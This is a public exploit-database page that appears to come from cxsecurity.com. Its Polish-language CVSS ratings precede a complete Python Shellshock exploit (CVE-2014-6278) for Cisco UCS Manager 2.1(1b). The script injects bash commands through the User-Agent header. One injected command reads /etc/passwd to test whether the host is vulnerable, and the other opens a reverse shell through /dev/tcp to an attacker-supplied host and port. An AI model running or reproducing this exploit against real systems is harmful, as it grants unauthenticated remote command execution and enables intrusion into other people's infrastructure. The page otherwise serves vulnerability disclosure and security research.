Cisco UCS Manager 2.1(1b) Shellshock

2016.03.17
Risk: High
Local: No
Remote: Yes
CWE: CWE-78


Ogólna skala CVSS: 10/10
Znaczenie: 10/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Pełny
Wpływ na integralność: Pełny
Wpływ na dostępność: Pełny

#!/usr/bin/python ############################################### # Cisco UCS Manager 2.1(1b) Shellshock Exploit # # CVE-2014-6278 # Confirmed on version 2.1(1b), but more are likely vulnerable. # Cisco's advisory: # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash # Exploit generates a reverse shell to a nc listener. # Exploit Author: @thatchriseckert ############################################### import sys import requests import time if len(sys.argv) < 4: print "\n[*] Cisco UCS Manager 2.1(1b) Shellshock Exploit" print "[*] Usage: <Victim IP> <Attacking Host> <Reverse Shell Port>" print "[*]" print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 4444" print "[*] Listener: nc -lvp <port>" print "\n" sys.exit() #Disables request warning for cert validation ignore. requests.packages.urllib3.disable_warnings() ucs = sys.argv[1] url = "https://" + ucs + "/ucsm/isSamInstalled.cgi" attackhost = sys.argv[2] revshellport = sys.argv[3] headers1 = { 'User-Agent': '() { ignored;};/bin/bash -i >& /dev/tcp/' + attackhost + '/' + revshellport + ' 0>&1' } headers2 = { "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo $(</etc/passwd)' } def exploit(): try: r = requests.get(url, headers=headers1, verify=False, timeout=5) except Exception, e: if 'timeout' in str(e): print "[+] Success. Enjoy your shell..." else: print "[-] Something is wrong..." print "[-] Error: " + str(e) def main(): try: r = requests.get(url, headers=headers2, verify=False, timeout=3) if r.content.startswith('\nroot:'): print "[+] Host is vulnerable, spawning shell..." time.sleep(3) exploit() else: print "[-] Host is not vulnerable, quitting..." sys.exit() except Exception, e: print "[-] Something is wrong..." print "[-] Error: " + str(e) if __name__ == "__main__": main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top